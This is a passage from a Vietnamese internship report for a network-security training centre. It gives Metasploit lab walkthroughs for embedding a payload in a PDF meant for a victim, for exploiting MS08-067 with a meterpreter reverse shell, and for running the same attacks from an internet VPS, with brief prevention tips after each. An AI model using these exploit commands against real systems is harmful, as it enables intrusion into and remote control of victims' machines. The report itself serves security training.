Cách phòng tránh
 Không xem những tài liệu được gửi đến từ người lạ, có nguồn gốc không rõ.
 Cập nhập bản vá lỗi cho MS-Word hoặc sử dụng phiên bản mới nhất của Microsoft Word (2013) hoặc một phần
mềm soạn thảo văn bản khác như Open Office.
Khai thác lỗi của Adobe Reader
Targets: Máy Adobe Reader v8.x, v9.x

Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP SP3 có cài đặt và dử dụng Adobe Reader
v8.x hoặc v9.x
Khởi động Metasploit của Backtrack bằng lệnh : msfconsole
Dùng lệnh
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Dùng lệnh show options để thể hiện các thuộc tính mã lỗi

Tiếp theo ta set INFIENAME:
set INFIENAME /home/target.pdf
/* Đây là file PDF bình thường không chứa mã độc */
set FILENAME evil.pdf
/* Đây là file PDF bình thường đã được đính kèm mã độc và sẽ được gửi đi cho victim */
exploit
Sau khi exploit file PDF nhận được, là file PDF bình thường đã được đính mã độc vào.
Tiếp theo ta tiến hành lắng nghe kết nối từ victim.
use exploit/multi/handler
set lport 4443
exploit

Cách phòng tránh
Lỗi này có thể dễ dành nhận biết được khi tiến hành mở file PDF.
Tại khung File, nếu để ý kỹ phần phía trên đoạn text này sẽ chứa một
đoạn mã rất dài và được cover lại bằng một đoạn text trống để nạn
nhân khó nhận biết được.
Để ngăn chặn việc tấn công ta chỉ cần ấn Do Not Open là sẽ chặn được
việc khai thác này.
Đây thực chất không phải là lỗ hổng hay lỗi của phần mềm mà đây là
một chức năng của Adobe Reader, nhưng chức năng này đã bị hacker lợi dụng cho mục đích xấu. Nên người dùng cần
phải hết sức thận trọng.
Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP
Targets: Windows XP tất cả các Service Pack
Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP
Tiến hành khai thác:
use exploit/windows/smb/ms08_067_netapi

Dùng lệnh show options để hiển thị các thông số cần cài đặt và tiến hành cài đặt các thông số này.
set RHOST 192.168.174.130
Cài đặt PAYLOAD với các thông số và tiến hành khai thác.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.174.128
exploit
Cách phòng tránh:
Đây là một lỗi rất nguy hiểm vì khi bị hacker tấn công, ở máy nạn nhân không hề có bất kỳ dấu hiệu nào đáng ngờ. Vì
thế cần thiết phải update bản vá lỗi cho Windows XP để tránh khỏi việc bị tấn công.
Thông tin chi tiết về mã lỗi xem tại
https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Tấn công qua mạng Internet, triển khai trên VPS
VPS là gì
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo.
Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server
chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart
lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn
công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản
trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ
không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình
server,….
Đặc điểm VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ
HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện
những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ
thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
Giá trị sử dụng của VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và Ddos Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Khai thác thông qua VPS
Việc khai thác thông qua VPS được tiến hành thực hiện tương tự trên localhost.
Nhưng đối với VPS sử dụng hệ điều hành Windows ta phải tiến hành cài đặt phần mềm Metasploit và tiến hành khai
thác như trên Backtrack.
Metasploit có thể download tại đây: http://www.metasploit.com/
Giao diện của Metasploit trên Windows

KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP
Trong suốt quá trình thực tập tại Trung tâm đào tạo quản trị & an ninh mạng Athena em đã có thêm nhiều kinh
nghiệm.
 Về kiến thức: ôn lại kỹ năng đã học, nâng cao khả năng học hỏi, trao dồi thêm nguồn kiến thức mới.
 Về kỹ năng tổ chức điều hành công việc: có cơ hội làm việc nhóm để rèn luyện kỹ năng làm việc nhóm tốt
hơn và khả năng phân chia công việc để hoàn thành đúng tiến độ.
 Về thái độ, trách nhiệm: có trách nhiệm với công việc, luôn hoàn thành mục tiêu đặt ra.

TÀI LIỆU THAM KHẢO
Tài liệu tham khảo chủ yếu của trung tâm Athena và một số nguồn khác.
http://www.hackingarticles.in
https://www.youtube.com
http://www.hackyshacky.com
i Nguồn: http://athena.edu.vn/home/gioi-thieu-athena.html
ii Nguồn: Sách CEH Lab Book – Trung tâm đào tạo quản trị & an ninh mạng Athena
iii Nguồn: http://www.windowsecurity.com/whitepapers/windows_security/Windows-Enumeration-USER2SID-SID2USER.html

Báo cáo cuối kỳ Athena - Report

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (16)

Similaire à Báo cáo cuối kỳ Athena - Report

Similaire à Báo cáo cuối kỳ Athena - Report (20)

Dernier

Dernier (20)

Báo cáo cuối kỳ Athena - Report